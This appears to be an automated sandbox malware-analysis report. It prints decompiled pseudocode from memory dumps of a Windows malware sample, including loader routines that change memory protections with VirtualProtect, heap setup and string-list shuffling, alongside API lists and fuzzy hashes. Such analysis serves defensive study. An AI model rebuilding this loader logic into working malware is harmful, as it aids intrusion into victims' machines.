                                                                                                                                                                                                                                						_t7 = _t26 + 0x2bbe9f9; // 0x44283a44
                                                                                                                                                                                                                                						_t27 = _t7;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E02BB276B(_t27, _t27);
                                                                                                                                                                                                                                					_t31 = E02BB1DF5(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                					if(_t31 == 0) {
                                                                                                                                                                                                                                						CloseHandle(_v20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t62 = 5;
                                                                                                                                                                                                                                					if(_t54 != _t62) {
                                                                                                                                                                                                                                						 *0x2bbd2a8 =  *0x2bbd2a8 ^ 0x81bbe65d;
                                                                                                                                                                                                                                						_t32 = E02BB5157(0x60);
                                                                                                                                                                                                                                						 *0x2bbd364 = _t32;
                                                                                                                                                                                                                                						__eflags = _t32;
                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                							_push(8);
                                                                                                                                                                                                                                							_pop(0);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							memset(_t32, 0, 0x60);
                                                                                                                                                                                                                                							_t49 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                							_t68 = _t68 + 0xc;
                                                                                                                                                                                                                                							__imp__(_t49 + 0x40);
                                                                                                                                                                                                                                							_t51 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                							 *_t51 = 0x2bbe823;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t54 = 0;
                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                						if(0 == 0) {
                                                                                                                                                                                                                                							_t36 = RtlAllocateHeap( *0x2bbd270, 0, 0x43);
                                                                                                                                                                                                                                							 *0x2bbd300 = _t36;
                                                                                                                                                                                                                                							__eflags = _t36;
                                                                                                                                                                                                                                							if(_t36 == 0) {
                                                                                                                                                                                                                                								_push(8);
                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t56 =  *0x2bbd294; // 0x4000000a
                                                                                                                                                                                                                                								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                                                								_t58 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                								_t13 = _t58 + 0x2bbe55a; // 0x697a6f4d
                                                                                                                                                                                                                                								_t55 = _t13;
                                                                                                                                                                                                                                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2bbc2a7);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t54 = 0;
                                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                                							if(0 == 0) {
                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                								E02BB9DE1( ~_v8 &  *0x2bbd2a8, 0x2bbd00c); // executed
                                                                                                                                                                                                                                								_t42 = E02BB235B(_t55); // executed
                                                                                                                                                                                                                                								_t54 = _t42;
                                                                                                                                                                                                                                								__eflags = _t54;
                                                                                                                                                                                                                                								if(_t54 != 0) {
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t43 = E02BB6EDD(); // executed
                                                                                                                                                                                                                                								__eflags = _t43;
                                                                                                                                                                                                                                								if(_t43 != 0) {
                                                                                                                                                                                                                                									__eflags = _v8;
                                                                                                                                                                                                                                									_t65 = _v12;
                                                                                                                                                                                                                                									if(_v8 != 0) {
                                                                                                                                                                                                                                										L29:
                                                                                                                                                                                                                                										_t44 = E02BB9FF2(_t61, _t65, _v8); // executed
                                                                                                                                                                                                                                										_t54 = _t44;
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags = _t65;
                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t54 = E02BBA23E(__eflags,  &(_t65[4]));
                                                                                                                                                                                                                                									__eflags = _t54;
                                                                                                                                                                                                                                									if(_t54 == 0) {
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L29;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t54 = 8;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t66 = _v12;
                                                                                                                                                                                                                                						if(_t66 == 0) {
                                                                                                                                                                                                                                							L30:
                                                                                                                                                                                                                                							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                								 *0x2bbd128();
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L34;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t67 =  &(_t66[4]);
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                						} while (E02BB6ABB(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L30;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t54 = _t22;
                                                                                                                                                                                                                                					L34:
                                                                                                                                                                                                                                					return _t54;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}































                                                                                                                                                                                                                                0x02bb57eb
                                                                                                                                                                                                                                0x02bb57f0
                                                                                                                                                                                                                                0x02bb57f7
                                                                                                                                                                                                                                0x02bb57fd
                                                                                                                                                                                                                                0x02bb5802
                                                                                                                                                                                                                                0x02bb5808
                                                                                                                                                                                                                                0x02bb580f
                                                                                                                                                                                                                                0x02bb5811
                                                                                                                                                                                                                                0x02bb5813
                                                                                                                                                                                                                                0x02bb5822
                                                                                                                                                                                                                                0x02bb5828
                                                                                                                                                                                                                                0x02bb582d
                                                                                                                                                                                                                                0x02bb582f
                                                                                                                                                                                                                                0x02bb585f
                                                                                                                                                                                                                                0x02bb5861
                                                                                                                                                                                                                                0x02bb5831
                                                                                                                                                                                                                                0x02bb5831
                                                                                                                                                                                                                                0x02bb5837
                                                                                                                                                                                                                                0x02bb5844
                                                                                                                                                                                                                                0x02bb584a
                                                                                                                                                                                                                                0x02bb584a
                                                                                                                                                                                                                                0x02bb5852
                                                                                                                                                                                                                                0x02bb585b
                                                                                                                                                                                                                                0x02bb5862
                                                                                                                                                                                                                                0x02bb5864
                                                                                                                                                                                                                                0x02bb5866
                                                                                                                                                                                                                                0x02bb586d
                                                                                                                                                                                                                                0x02bb587a
                                                                                                                                                                                                                                0x02bb587f
                                                                                                                                                                                                                                0x02bb5884
                                                                                                                                                                                                                                0x02bb5886
                                                                                                                                                                                                                                0x02bb5888
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb588a
                                                                                                                                                                                                                                0x02bb588f
                                                                                                                                                                                                                                0x02bb5891
                                                                                                                                                                                                                                0x02bb5898
                                                                                                                                                                                                                                0x02bb589c
                                                                                                                                                                                                                                0x02bb589f
                                                                                                                                                                                                                                0x02bb58b4
                                                                                                                                                                                                                                0x02bb58b8
                                                                                                                                                                                                                                0x02bb58bd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58bd
                                                                                                                                                                                                                                0x02bb58a1
                                                                                                                                                                                                                                0x02bb58a3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58ae
                                                                                                                                                                                                                                0x02bb58b0
                                                                                                                                                                                                                                0x02bb58b2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58b2
                                                                                                                                                                                                                                0x02bb5895
                                                                                                                                                                                                                                0x02bb5895
                                                                                                                                                                                                                                0x02bb5866
                                                                                                                                                                                                                                0x02bb57a4
                                                                                                                                                                                                                                0x02bb57a4
                                                                                                                                                                                                                                0x02bb57a9
                                                                                                                                                                                                                                0x02bb58bf
                                                                                                                                                                                                                                0x02bb58c3
                                                                                                                                                                                                                                0x02bb58cb
                                                                                                                                                                                                                                0x02bb58cb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58c3
                                                                                                                                                                                                                                0x02bb57af
                                                                                                                                                                                                                                0x02bb57b2
                                                                                                                                                                                                                                0x02bb57bc
                                                                                                                                                                                                                                0x02bb57c3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb58d3
                                                                                                                                                                                                                                0x02bb58d3
                                                                                                                                                                                                                                0x02bb58d7
                                                                                                                                                                                                                                0x02bb58db
                                                                                                                                                                                                                                0x02bb58db

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB2CC9: GetModuleHandleA.KERNEL32(4C44544E,00000000,02BB571A,00000000,00000000), ref: 02BB2CD8
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02BB5797
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB57E6
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(052F9570), ref: 02BB57F7
                                                                                                                                                                                                                                  • Part of subcall function 02BBA23E: memset.NTDLL ref: 02BBA253
                                                                                                                                                                                                                                  • Part of subcall function 02BBA23E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02BBA295
                                                                                                                                                                                                                                  • Part of subcall function 02BBA23E: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02BBA2A0
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02BB5822
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BB5852
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4246211962-0
                                                                                                                                                                                                                                • Opcode ID: 9bec615a42e083485f41d23ca328a6b82dfb7aff55d6f21041ce8640c93863c7
                                                                                                                                                                                                                                • Instruction ID: 1eca39d44faa20a0d58afe9a39d14a67cd24736d21de04a9ddfe544a3e67800c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bec615a42e083485f41d23ca328a6b82dfb7aff55d6f21041ce8640c93863c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F051CF71E41216ABEF33ABA0DC84BFE77A8EF04740F8448A6E546D7140E7F4E5408B51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 22%
                                                                                                                                                                                                                                			E02BB5CFD(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				intOrPtr _t81;
                                                                                                                                                                                                                                				char _t83;
                                                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                                                				signed int _t97;
                                                                                                                                                                                                                                				signed int _t99;
                                                                                                                                                                                                                                				char _t101;
                                                                                                                                                                                                                                				unsigned int _t102;
                                                                                                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                                                                                                				char* _t107;
                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                				signed int _t113;
                                                                                                                                                                                                                                				signed int _t118;
                                                                                                                                                                                                                                				signed int _t122;
                                                                                                                                                                                                                                				intOrPtr _t124;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t102 = _a8;
                                                                                                                                                                                                                                				_t118 = 0;
                                                                                                                                                                                                                                				_v20 = __eax;
                                                                                                                                                                                                                                				_t122 = (_t102 >> 2) + 1;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_a8 = 0;
                                                                                                                                                                                                                                				_t81 = E02BB5157(_t122 << 2);
                                                                                                                                                                                                                                				_v16 = _t81;
                                                                                                                                                                                                                                				if(_t81 == 0) {
                                                                                                                                                                                                                                					_push(8);
                                                                                                                                                                                                                                					_pop(0);
                                                                                                                                                                                                                                					L37:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t107 = _a4;
                                                                                                                                                                                                                                				_a4 = _t102;
                                                                                                                                                                                                                                				_t113 = 0;
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t83 =  *_t107;
                                                                                                                                                                                                                                					if(_t83 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                                                                                                                                                						if(_t118 != 0) {
                                                                                                                                                                                                                                							if(_t118 > _v8) {
                                                                                                                                                                                                                                								_v8 = _t118;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_a8 = _a8 + 1;
                                                                                                                                                                                                                                							_t118 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_t107 = 0;
                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t118 != 0) {
                                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                                							_t118 = _t118 + 1;
                                                                                                                                                                                                                                							L16:
                                                                                                                                                                                                                                							_t107 = _t107 + 1;
                                                                                                                                                                                                                                							_t15 =  &_a4;
                                                                                                                                                                                                                                							 *_t15 = _a4 - 1;
                                                                                                                                                                                                                                							if( *_t15 != 0) {
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t113 == _t122) {
                                                                                                                                                                                                                                							L21:
                                                                                                                                                                                                                                							if(_a8 <= 0x20) {
                                                                                                                                                                                                                                								_push(0xb);
                                                                                                                                                                                                                                								L34:
                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                								L35:
                                                                                                                                                                                                                                								E02BB53BB(_v16);
                                                                                                                                                                                                                                								goto L37;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                                                                                                                                                							_t103 = E02BB5157((_v8 + _t24) * _a8 + 4);
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_push(8);
                                                                                                                                                                                                                                								goto L34;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t90 = _a8;
                                                                                                                                                                                                                                							_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                                							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                							_t124 = _t103 + _t90 * 4;
                                                                                                                                                                                                                                							if(_t90 <= 0) {
                                                                                                                                                                                                                                								L31:
                                                                                                                                                                                                                                								 *0x2bbd2b0 = _t103;
                                                                                                                                                                                                                                								goto L35;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                                                                                                                                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                                                                                                                                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                                                                                                                                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                                                                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                								if(_a4 <= 0) {
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L26;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                                                									L26:
                                                                                                                                                                                                                                									_t99 = _v12;
                                                                                                                                                                                                                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                                                                                                                                                									if(_t99 == 0) {
                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_v12 = _v12 + 1;
                                                                                                                                                                                                                                									if(_v12 < _a4) {
                                                                                                                                                                                                                                										continue;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_v8 = _v8 - 1;
                                                                                                                                                                                                                                								L30:
                                                                                                                                                                                                                                								_t97 = _a4;
                                                                                                                                                                                                                                								_a4 = _a4 + 1;
                                                                                                                                                                                                                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                                                                                                                                                								__imp__(_t124);
                                                                                                                                                                                                                                								_v8 = _v8 + 1;
                                                                                                                                                                                                                                								_t124 = _t124 + _t97 + 1;
                                                                                                                                                                                                                                							} while (_v8 < _a8);
                                                                                                                                                                                                                                							goto L31;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                                                                                                                                                						_t101 = _t83;
                                                                                                                                                                                                                                						if(_t83 - 0x61 <= 0x19) {
                                                                                                                                                                                                                                							_t101 = _t101 - 0x20;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_t107 = _t101;
                                                                                                                                                                                                                                						_t113 = _t113 + 1;
                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t118 != 0) {
                                                                                                                                                                                                                                					if(_t118 > _v8) {
                                                                                                                                                                                                                                						_v8 = _t118;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_a8 = _a8 + 1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L21;
                                                                                                                                                                                                                                			}






















APIs
  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
• lstrcpy.KERNEL32(69B25F45,00000020), ref: 02BB5DFA
• lstrcat.KERNEL32(69B25F45,00000020), ref: 02BB5E0F
• lstrcmp.KERNEL32(00000000,69B25F45), ref: 02BB5E26
• lstrlen.KERNEL32(69B25F45), ref: 02BB5E4A
Strings
Memory Dump Source
• Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
• Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
• Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
• Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
Similarity
• API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
• String ID:
• API String ID: 3214092121-3916222277
• Opcode ID: a8a95f12b35723e36ff2491d9e86f38652d403a513ca2b1563a2be3edf512bc3
• Instruction ID: 62e23eff94fa109675dc3e32ff95e3d52200699b0d23bcb4b8d6d83789e8842e
• Opcode Fuzzy Hash: a8a95f12b35723e36ff2491d9e86f38652d403a513ca2b1563a2be3edf512bc3
• Instruction Fuzzy Hash: 51519275A00108EFDF32CF99C584AFDBBB6FF45354F94819AE8159B201C7B0AA51CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB2932(void* __edx) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                				WCHAR* _v16;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				intOrPtr _t24;
                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                                				void* _t50;
                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t50 = __edx;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				_t23 = E02BB9B32(0,  &_v8); // executed
                                                                                                                                                                                                                                				if(_t23 != 0) {
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t24 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t4 = _t24 + 0x2bbedc8; // 0x52f9370
                                                                                                                                                                                                                                				_t5 = _t24 + 0x2bbed70; // 0x4f0053
                                                                                                                                                                                                                                				_t26 = E02BB779A( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                				_t45 = _t26;
                                                                                                                                                                                                                                				if(_t45 == 0) {
                                                                                                                                                                                                                                					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                					_t45 = 8;
                                                                                                                                                                                                                                					if(_v12 < _t45) {
                                                                                                                                                                                                                                						_t45 = 1;
                                                                                                                                                                                                                                						__eflags = 1;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t32 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                						_t11 = _t32 + 0x2bbedbc; // 0x52f9364
                                                                                                                                                                                                                                						_t48 = _t11;
                                                                                                                                                                                                                                						_t12 = _t32 + 0x2bbed70; // 0x4f0053
                                                                                                                                                                                                                                						_t52 = E02BB1FCE(_t11, _t12, _t11);
                                                                                                                                                                                                                                						_t59 = _t52;
                                                                                                                                                                                                                                						if(_t52 != 0) {
                                                                                                                                                                                                                                							_t35 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                							_t13 = _t35 + 0x2bbee06; // 0x30314549
                                                                                                                                                                                                                                							_t37 = E02BB2AE3(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                                                                                                                                                                                                							if(_t37 == 0) {
                                                                                                                                                                                                                                								_t61 =  *0x2bbd294 - 6;
                                                                                                                                                                                                                                								if( *0x2bbd294 <= 6) {
                                                                                                                                                                                                                                									_t42 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                									_t15 = _t42 + 0x2bbec12; // 0x52384549
                                                                                                                                                                                                                                									E02BB2AE3(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t38 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                							_t17 = _t38 + 0x2bbee00; // 0x52f93a8
                                                                                                                                                                                                                                							_t18 = _t38 + 0x2bbedd8; // 0x680043
                                                                                                                                                                                                                                							_t40 = E02BB9BED(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                                                                                                                                                                                                                							_t45 = _t40;
                                                                                                                                                                                                                                							HeapFree( *0x2bbd270, 0, _t52);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _v16);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t54 = _v8;
                                                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                                                					E02BB704F(_t54);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t45;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052F9370,00000000,?,747DF710,00000000,747DF730), ref: 02BB2981
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052F93A8,?,00000000,30314549,00000014,004F0053,052F9364), ref: 02BB2A1E
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BBA080), ref: 02BB2A30
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: 245aa251321990a28751f73d190e60c86be8ba8c22b2fe628e85ccc7ecada926
                                                                                                                                                                                                                                • Instruction ID: 937aa9802577da0195a5f2f935ccfa43ee946bcec00a8c3ba21165ceb8f0d9c0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 245aa251321990a28751f73d190e60c86be8ba8c22b2fe628e85ccc7ecada926
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA31CF32D00109BFDB23DBA4DD84EEA7BBDFF48740F1604A9AA01A7060D7F0AA15DB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E02B81B7F(void* __eax, void* _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                				int _t43;
                                                                                                                                                                                                                                				long _t54;
                                                                                                                                                                                                                                				signed int _t57;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				signed int _t60;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                				_t57 =  *0x2b841c0;
                                                                                                                                                                                                                                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                                				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				if(_v16 <= 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					L1:
                                                                                                                                                                                                                                					_t60 = _v12;
                                                                                                                                                                                                                                					if(_t60 != 0) {
                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                					if(_t60 >= 0) {
                                                                                                                                                                                                                                						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                						if(__eflags >= 0) {
                                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                                							_t54 = _t57 - 0x69b25f40;
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                                                                                                                							if(_t43 == 0) {
                                                                                                                                                                                                                                								_v12 = GetLastError();
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_v8 = _v8 + 1;
                                                                                                                                                                                                                                							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                                                                                                                                                                                                                							if(_v8 < _v16) {
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                						_t54 = _t57 - 0x69b25f42;
                                                                                                                                                                                                                                						if(__eflags >= 0) {
                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                					if(_t60 >= 0) {
                                                                                                                                                                                                                                						_t54 = _t57 - 0x69b25f24;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t54 = _t57 - 0x69b25f04;
